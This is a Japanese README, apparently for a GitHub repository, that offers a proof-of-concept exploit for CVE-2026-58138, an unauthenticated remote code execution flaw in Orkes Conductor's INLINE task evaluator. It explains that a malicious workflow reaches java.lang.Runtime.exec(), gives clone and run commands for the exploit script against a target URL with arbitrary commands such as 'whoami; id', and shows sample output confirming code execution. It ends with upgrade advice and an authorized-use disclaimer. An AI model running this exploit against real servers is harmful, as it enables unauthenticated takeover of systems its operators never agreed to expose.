
CVE-2026-58138 - Conductor (3.21.21..<3.30.2) 認証不要のRCE(INLINE GraalVM評価器経由)
Orkes Conductor における重大なリモートコード実行の脆弱性
CVE-2026-58138 は、Orkes Conductor バージョン 3.21.21 から 3.30.1 に影響を与える、重大な未認証リモートコード実行(RCE)脆弱性です。この脆弱性により、攻撃者は認証を必要とせずに Conductor サーバー上で任意のコマンドを実行でき、システム全体が危険にさらされる可能性があります。
この脆弱性は、Orkes Conductor のワークフローエンジンにおける INLINE タスク タイプに存在します。INLINE タスクは、eval を介して Java オブジェクトにアクセスする JavaScript の評価をサポートしており、攻撃者は以下のことが可能です。
INLINE タスクを持つ悪意のあるワークフローを登録するjava.lang.Runtime.exec() を介して Conductor サーバー上でシステムコマンドを実行する| バージョン範囲 | ステータス |
|---|---|
| 3.21.21 - 3.30.1 | ✅ 脆弱 |
| > 3.30.1 | ❌ 修正済み |
# Clone the repository
git clone https://github.com/0xgh057r3c0n/CVE-2026-58138.git
cd CVE-2026-58138
# Make the script executable
chmod +x CVE-2026-58138.py
# Verify installation
python3 CVE-2026-58138.py --help
# Basic usage
python3 CVE-2026-58138.py http://target:8080
# Custom command
python3 CVE-2026-58138.py http://target:8080 -c "whoami; id"
[>] Orkes Conductor 3.21.21 - 3.30.1 Remote Code Execution
[>] Author: 0xgh057r3c0n
[>] CVE-2026-58138 Unauthenticated RCE PoC
[*] target = http://192.168.1.100:8080
[*] command = 'id; hostname'
[+] workflow 'pwn_1742345678' registered (HTTP 200)
[+] started workflow id = 123e4567-e89b-12d3-a456-426614174000
[+] UNAUTHENTICATED RCE CONFIRMED – command output:
uid=1000(conductor) gid=1000(conductor) groups=1000(conductor)
conductor-server-6b7c8d9e0f-abc12
3.30.2 以降にアップグレードする教育およびセキュリティ研究目的のみに使用してください。 自分が所有するシステム、または明示的なテスト許可があるシステムでのみ使用してください。
⭐ これが役に立ちましたか? GitHub でスターを付けてください ⭐